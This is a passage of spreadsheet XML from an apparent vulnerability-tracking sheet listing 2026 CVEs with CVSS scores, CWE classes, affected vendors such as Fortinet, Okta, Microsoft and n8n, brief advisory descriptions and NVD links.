t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1466" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1466" s="5" t="inlineStr" /><c r="H1466" s="5" t="n"><v>0.001</v></c><c r="I1466" s="5" t="inlineStr" /><c r="J1466" s="5" t="inlineStr" /><c r="K1466" s="5" t="inlineStr" /><c r="L1466" s="5" t="inlineStr" /><c r="M1466" s="5" t="inlineStr" /><c r="N1466" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1466" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1466" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1466" s="5" t="inlineStr" /><c r="R1466" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1466"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466" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-12387</t></is></c></row><row r="1467"><c r="A1467" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1467" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1467" s="5" t="inlineStr"><is><t>CVE-2026-33387</t></is></c><c r="D1467" s="5" t="n"><v>5.1</v></c><c r="E1467" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1467" s="5" t="inlineStr"><is><t>prodsec@nozominetworks.com</t></is></c><c r="G1467" s="5" t="inlineStr" /><c r="H1467" s="5" t="n"><v>0.002</v></c><c r="I1467" s="5" t="inlineStr" /><c r="J1467" s="5" t="inlineStr" /><c r="K1467" s="5" t="inlineStr" /><c r="L1467" s="5" t="inlineStr" /><c r="M1467" s="5" t="inlineStr" /><c r="N1467" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1467" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1467" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1467" s="5" t="inlineStr" /><c r="R1467" s="5" t="inlineStr"><is><t>CWE-1336</t></is></c><c r="S1467" s="5" t="inlineStr"><is><t>A template injection vulnerability was discovered in the Dashboards functionality due to improper validation of an input parameter. An authenticated user with the required privileges can define a dashboard containing a malicious payload, or a victim can be socially engineered into importing a malicious dashboard. When the victim views or imports the dashboard, the payload executes in their browser context, allowing the attacker to modify application data or disrupt application availability.</t></is></c><c r="T1467" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-33387</t></is></c></row><row r="1468"><c r="A1468" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1468" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1468" s="5" t="inlineStr"><is><t>CVE-2026-33920</t></is></c><c r="D1468" s="5" t="n"><v>5.1</v></c><c r="E1468" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1468" s="5" t="inlineStr"><is><t>prodsec@nozominetworks.com</t></is></c><c r="G1468" s="5" t="inlineStr" /><c r="H1468" s="5" t="n"><v>0.001</v></c><c r="I1468" s="5" t="inlineStr" /><c r="J1468" s="5" t="inlineStr" /><c r="K1468" s="5" t="inlineStr" /><c r="L1468" s="5" t="inlineStr" /><c r="M1468" s="5" t="inlineStr" /><c r="N1468" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1468" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1468" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1468" s="5" t="inlineStr" /><c r="R1468" s="5" t="inlineStr"><is><t>CWE-352</t></is></c><c r="S1468" s="5" t="inlineStr"><is><t>A cross-site request forgery vulnerability was discovered in the login functionality (both standard and SAML) due to missing validation of the anti-CSRF token. An attacker with a valid account can trick a victim into unknowingly authenticating with the attacker's credentials. Any operation performed by the victim in this state is attributed to the attacker's account, compromising the integrity of the audit trail.</t></is></c><c r="T1468" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-33920</t></is></c></row><row r="1469"><c r="A1469" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1469" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1469" s="5" t="inlineStr"><is><t>CVE-2026-73317</t></is></c><c r="D1469" s="5" t="n"><v>5.1</v></c><c r="E1469" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1469" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1469" s="5" t="inlineStr" /><c r="H1469" s="5" t="n"><v>0.003</v></c><c r="I1469" s="5" t="inlineStr" /><c r="J1469" s="5" t="inlineStr" /><c r="K1469" s="5" t="inlineStr"><is><t>xenforo:xenforo</t></is></c><c r="L1469" s="5" t="inlineStr" /><c r="M1469" s="5" t="inlineStr" /><c r="N1469" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1469" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1469" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1469" s="5" t="inlineStr" /><c r="R1469" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S1469" s="5" t="inlineStr"><is><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is></c><c r="T1469" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73317</t></is></c></row><row r="1470"><c r="A1470" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1470" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1470" s="5" t="inlineStr"><is><t>CVE-2026-73318</t></is></c><c r="D1470" s="5" t="n"><v>5.1</v></c><c r="E1470" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1470" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1470" s="5" t="inlineStr" /><c r="H1470" s="5" t="n"><v>0.003</v></c><c r="I1470" s="5" t="inlineStr" /><c r="J1470" s="5" t="inlineStr" /><c r="K1470" s="5" t="inlineStr"><is><t>xenforo:xenforo</t></is></c><c r="L1470" s="5" t="inlineStr" /><c r="M1470" s="5" t="inlineStr" /><c r="N1470" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1470" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1470" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q1470" s="5" t="inlineStr" /><c r="R1470" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S1470" s="5" t="inlineStr"><is><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is></c><c r="T1470" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73318</t></is></c></row><row r="1471"><c r="A1471" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1471" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1471" s="5" t="inlineStr"><is><t>CVE-2026-73319</t></is></c><c r="D1471" s="5" t="n"><v>5.1</v></c><c r="E1471" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1471" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1471" s="5" t="inlineStr" /><c r="H1471" s="5" t="n"><v>0.003</v></c><c r="I1471" s="5" t="inlineStr" /><c r="J1471" s="5" t="inlineStr" /><c r="K1471" s="5" t="inlineStr"><is><t>xenforo:xenforo</t></is></c><c r="L1471" s="5" t="inlineStr" /><c r="M1471" s="5" t="inlineStr" /><c r="N1471" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1471" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1471" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1471" s="5" t="inlineStr" /><c r="R1471" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1471" s="5" t="inlineStr"><is><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is></c><c r="T1471" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73319</t></is></c></row><row r="1472"><c r="A1472" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1472" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1472" s="5" t="inlineStr"><is><t>CVE-2026-73320</t></is></c><c r="D1472" s="5" t="n"><v>5.1</v></c><c r="E1472" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1472" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1472" s="5" t="inlineStr" /><c r="H1472" s="5" t="n"><v>0.003</v></c><c r="I1472" s="5" t="inlineStr" /><c r="J1472" s="5" t="inlineStr" /><c r="K1472" s="5" t="inlineStr"><is><t>xenforo:xenforo</t></is></c><c r="L1472" s="5" t="inlineStr" /><c r="M1472" s="5" t="inlineStr" /><c r="N1472" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1472" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1472" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1472" s="5" t="inlineStr" /><c r="R1472" s="5" t="inlineStr"><is><t>CWE-639</t></is></c><c r="S1472" s="5" t="inlineStr"><is><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is></c><c r="T1472" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73320</t></is></c></row><row r="1473"><c r="A1473" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1473" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1473" s="5" t="inlineStr"><is><t>CVE-2026-84386</t></is></c><c r="D1473" s="5" t="n"><v>5.1</v></c><c r="E1473" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1473" s="5" t="inlineStr"><is><t>psirt@fortinet.com</t></is></c><c r="G1473" s="5" t="inlineStr" /><c r="H1473" s="5" t="n"><v>0.001</v></c><c r="I1473" s="5" t="inlineStr" /><c r="J1473" s="5" t="inlineStr"><is><t>fortinet</t></is></c><c r="K1473" s="5" t="inlineStr" /><c r="L1473" s="5" t="inlineStr" /><c r="M1473" s="5" t="inlineStr" /><c r="N1473" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1473" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1473" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1473" s="5" t="inlineStr" /><c r="R1473" s="5" t="inlineStr"><is><t>CWE-283</t></is></c><c r="S1473" s="5" t="inlineStr"><is><t>A unverified ownership vulnerability in Fortinet FortiClientWindows 7.4.0 through 7.4.7, FortiClientWindows 7.2 all versions may allow attacker to improper access control via &lt;insert attack vector here&gt;</t></is></c><c r="T1473" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84386</t></is></c></row><row r="1474"><c r="A1474" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1474" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1474" s="5" t="inlineStr"><is><t>CVE-2026-86516</t></is></c><c r="D1474" s="5" t="n"><v>5.1</v></c><c r="E1474" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1474" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1474" s="5" t="inlineStr" /><c r="H1474" s="5" t="n"><v>0.002</v></c><c r="I1474" s="5" t="inlineStr" /><c r="J1474" s="5" t="inlineStr" /><c r="K1474" s="5" t="inlineStr" /><c r="L1474" s="5" t="inlineStr" /><c r="M1474" s="5" t="inlineStr" /><c r="N1474" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1474" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1474" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1474" s="5" t="inlineStr" /><c r="R1474" s="5" t="inlineStr"><is><t>CWE-266, CWE-269</t></is></c><c r="S1474" s="5" t="inlineStr"><is><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is></c><c r="T1474" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86516</t></is></c></row><row r="1475"><c r="A1475" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1475" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1475" s="5" t="inlineStr"><is><t>CVE-2026-72976</t></is></c><c r="D1475" s="5" t="n"><v>5</v></c><c r="E1475" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1475" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1475" s="5" t="inlineStr" /><c r="H1475" s="5" t="n"><v>0.004</v></c><c r="I1475" s="5" t="inlineStr" /><c r="J1475" s="5" t="inlineStr" /><c r="K1475" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L1475" s="5" t="inlineStr" /><c r="M1475" s="5" t="inlineStr" /><c r="N1475" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1475" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1475" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1475" s="5" t="inlineStr" /><c r="R1475" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1475" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Word allows an authorized attacker to disclose information locally.</t></is></c><c r="T1475" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72976</t></is></c></row><row r="1476"><c r="A1476" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1476" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1476" s="5" t="inlineStr"><is><t>CVE-2026-78635</t></is></c><c r="D1476" s="5" t="n"><v>5</v></c><c r="E1476" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1476" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G1476" s="5" t="inlineStr" /><c r="H1476" s="5" t="n"><v>0.002</v></c><c r="I1476" s="5" t="inlineStr" /><c r="J1476" s="5" t="inlineStr"><is><t>okta</t></is></c><c r="K1476" s="5" t="inlineStr" /><c r="L1476" s="5" t="inlineStr" /><c r="M1476" s="5" t="inlineStr" /><c r="N1476" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1476" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1476" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1476" s="5" t="inlineStr" /><c r="R1476" s="5" t="inlineStr"><is><t>CWE-88</t></is></c><c r="S1476" s="5" t="inlineStr"><is><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is></c><c r="T1476" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78635</t></is></c></row><row r="1477"><c r="A1477" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1477" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1477" s="5" t="inlineStr"><is><t>CVE-2026-79904</t></is></c><c r="D1477" s="5" t="n"><v>5</v></c><c r="E1477" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1477" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1477" s="5" t="inlineStr" /><c r="H1477" s="5" t="n"><v>0.001</v></c><c r="I1477" s="5" t="inlineStr" /><c r="J1477" s="5" t="inlineStr" /><c r="K1477" s="5" t="inlineStr"><is><t>adobe:photoshop_mobile</t></is></c><c r="L1477" s="5" t="inlineStr" /><c r="M1477" s="5" t="inlineStr" /><c r="N1477" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1477" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1477" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1477" s="5" t="inlineStr" /><c r="R1477" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="S1477" s="5" t="inlineStr"><is><t>Photoshop Mobile is affected by an Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability that could result in a Security feature bypass. A low-privileged attacker could leverage this vulnerability to access unauthorized files or directories outside the intended restrictions. Exploit depends on conditions beyond the attacker's control. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T1477" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79904</t></is></c></row><row r="1478"><c r="A1478" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1478" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1478" s="5" t="inlineStr"><is><t>CVE-2026-86735</t></is></c><c r="D1478" s="5" t="n"><v>5</v></c><c r="E1478" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1478" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1478" s="5" t="inlineStr" /><c r="H1478" s="5" t="n"><v>0.002</v></c><c r="I1478" s="5" t="inlineStr" /><c r="J1478" s="5" t="inlineStr" /><c r="K1478" s="5" t="inlineStr"><is><t>snipeitapp:snipe-it</t></is></c><c r="L1478" s="5" t="inlineStr" /><c r="M1478" s="5" t="inlineStr" /><c r="N1478" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1478" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1478" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1478" s="5" t="inlineStr" /><c r="R1478" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="S1478" s="5" t="inlineStr"><is><t>snipe-it versions before 8.7.0 contain a server-side request forgery vulnerability in the ExternalUrl validation rule that fails to detect IPv6 transition addresses encoding private IPv4 targets. Attackers with super-admin privileges can configure webhook URLs using NAT64, 6to4, or Teredo transition addresses to bypass SSRF guards and access internal services or cloud metadata endpoints.</t></is></c><c r="T1478" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86735</t></is></c></row><row r="1479"><c r="A1479" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1479" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1479" s="5" t="inlineStr"><is><t>CVE-2026-22575</t></is></c><c r="D1479" s="5" t="n"><v>4.9</v></c><c r="E1479" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1479" s="5" t="inlineStr"><is><t>psirt@fortinet.com</t></is></c><c r="G1479" s="5" t="inlineStr" /><c r="H1479" s="5" t="n"><v>0.002</v></c><c r="I1479" s="5" t="inlineStr" /><c r="J1479" s="5" t="inlineStr"><is><t>fortinet</t></is></c><c r="K1479" s="5" t="inlineStr" /><c r="L1479" s="5" t="inlineStr" /><c r="M1479" s="5" t="inlineStr" /><c r="N1479" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1479" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1479" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1479" s="5" t="inlineStr" /><c r="R1479" s="5" t="inlineStr"><is><t>CWE-284</t></is></c><c r="S1479" s="5" t="inlineStr"><is><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is></c><c r="T1479" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-22575</t></is></c></row><row r="1480"><c r="A1480" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1480" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1480" s="5" t="inlineStr"><is><t>CVE-2026-68785</t></is></c><c r="D1480" s="5" t="n"><v>4.9</v></c><c r="E1480" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1480" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1480" s="5" t="inlineStr" /><c r="H1480" s="5" t="n"><v>0.008</v></c><c r="I1480" s="5" t="inlineStr" /><c r="J1480" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1480" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1480" s="5" t="inlineStr" /><c r="M1480" s="5" t="inlineStr" /><c r="N1480" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1480" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1480" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1480" s="5" t="inlineStr" /><c r="R1480" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S1480" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="T1480" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68785</t></is></c></row><row r="1481"><c r="A1481" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1481" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1481" s="5" t="inlineStr"><is><t>CVE-2026-78624</t></is></c><c r="D1481" s="5" t="n"><v>4.9</v></c><c r="E1481" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1481" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G1481" s="5" t="inlineStr" /><c r="H1481" s="5" t="n"><v>0.004</v></c><c r="I1481" s="5" t="inlineStr" /><c r="J1481" s="5" t="inlineStr"><is><t>okta</t></is></c><c r="K1481" s="5" t="inlineStr" /><c r="L1481" s="5" t="inlineStr" /><c r="M1481" s="5" t="inlineStr" /><c r="N1481" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1481" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1481" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1481" s="5" t="inlineStr" /><c r="R1481" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="S1481" s="5" t="inlineStr"><is><t>The Okta Access Gateway backup restore function does not validate the filename embedded in an encrypted backup payload. This results in writing file contents to unintended locations on the appliance filesystem.</t></is></c><c r="T1481" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78624</t></is></c></row><row r="1482"><c r="A1482" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1482" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1482" s="5" t="inlineStr"><is><t>CVE-2026-86085</t></is></c><c r="D1482" s="5" t="n"><v>4.9</v></c><c r="E1482" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1482" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1482" s="5" t="inlineStr" /><c r="H1482" s="5" t="n"><v>0.003</v></c><c r="I1482" s="5" t="inlineStr" /><c r="J1482" s="5" t="inlineStr" /><c r="K1482" s="5" t="inlineStr"><is><t>n8n:n8n</t></is></c><c r="L1482" s="5" t="inlineStr" /><c r="M1482" s="5" t="inlineStr" /><c r="N1482" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1482" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1482" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q1482" s="5" t="inlineStr" /><c r="R1482" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S1482" s="5" t="inlineStr"><is><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is></c><c r="T1482" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86085</t></is></c></row><row r="1483"><c r="A1483" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1483" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1483" s="5" t="inlineStr"><is><t>CVE-2026-86993</t></is></c><c r="D1483" s="5" t="n"><v>4.9</v></c><c r="E1483" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1483" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1483" s="5" t="inlineStr" /><c r="H1483" s="5" t="n"><v>0.003</v></c><c r="I1483" s="5" t="inlineStr" /><c r="J1483" s="5" t="inlineStr" /><c r="K1483" s="5" t="inlineStr"><is><t>n8n:n8n</t></is></c><c r="L1483" s="5" t="inlineStr" /><c r="M1483" s="5" t="inlineStr" /><c r="N1483" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1483" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1483" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1483" s="5" t="inlineStr" /><c r="R1483" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S1483" s="5" t="inlineStr"><is><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is></c><c r="T1483" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86993</t></is></c></row><row r="1484"><c r="A1484" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1484" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1484" s="5" t="inlineStr"><is><t>CVE-2026-69474</t></is></c><c r="D1484" s="5" t="n"><v>4.8</v></c><c r="E1484" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1484" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1484" s="5" t="inlineStr" /><c r="H1484" s="5" t="n"><v>0.007</v></c><c r="I1484" s="5" t="inlineStr" /><c r="J1484" s="5" t="inlineStr" /><c r="K1484" s="5" t="inlineStr" /><c r="L1484" s="5" t="inlineStr" /><c r="M1484" s="5" t="inlineStr" /><c r="N1484" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1484" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1484" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1484" s="5" t="inlineStr" /><c r="R1484" s="5" t="inlineStr"><is><t>CWE-126, CWE-416</t></is></c><c r="S1484" s="5" t="inlineStr"><is><t>Use after free in Windows Overlay Filter allows an authorized attacker to disclose information over a network.</t></is></c><c r="T1484" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69474</t></is></c></row><row r="1485"><c r="A1485" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1485" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1485" s="5" t="inlineStr"><is><t>CVE-2026-69615</t></is></c><c r="D1485" s="5" t="n"><v>4.8</v></c><c r="E1485" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1485" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1485" s="5" t="inlineStr" /><c r="H1485" s="5" t="n"><v>0.004</v></c><c r="I1485" s="5" t="inlineStr" /><c r="J1485" s="5" t="inlineStr"><is><t>microsoft:sharepoint</t></is></c><c r="K1485" s="5" t="inlineStr"><is><t>microsoft:sharepoint_server</t></is></c><c r="L1485" s="5" t="inlineStr" /><c r="M1485" s="5" t="inlineStr" /><c r="N1485" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1485" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1485" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1485" s="5" t="inlineStr" /><c r="R1485" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1485" s="5" t="inlineStr"><is><t>Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network.</t></is></c><c r="T1485" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69615</t></is></c></row><row r="1486"><c r="A1486" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1486" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1486" s="5" t="inlineStr"><is><t>CVE-2026-78560</t></is></c><c r="D1486" s="5" t="n"><v>4.8</v></c><c r="E1486" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1486" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G1486" s="5" t="inlineStr" /><c r="H1486" s="5" t="n"><v>0.002</v></c><c r="I1486" s="5" t="inlineStr" /><c r="J1486" s="5" t="inlineStr"><is><t>okta</t></is></c><c r="K1486" s="5" t="inlineStr" /><c r="L1486" s="5" t="inlineStr" /><c r="M1486" s="5" t="inlineStr" /><c r="N1486" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1486" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1486" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1486" s="5" t="inlineStr" /><c r="R1486" s="5" t="inlineStr"><is><t>CWE-287</t></is></c><c r="S1486" s="5" t="inlineStr"><is><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is></c><c r="T1486" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78560</t></is></c></row><row r="1487"><c r="A1487" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1487" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1487" s="5" t="inlineStr"><is><t>CVE-2026-68849</t></is></c><c r="D1487" s="5" t="n"><v>4.7</v></c><c r="E1487" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1487" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1487" s="5" t="inlineStr" /><c r="H1487" s="5" t="n"><v>0.002</v></c><c r="I1487" s="5" t="inlineStr" /><c r="J1487" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1487" s="5" t="inlineStr"><is><t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1487" s="5" t="inlineStr" /><c r="M1487" s="5" t="inlineStr" /><c r="N1487" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1487" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1487" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1487" s="5" 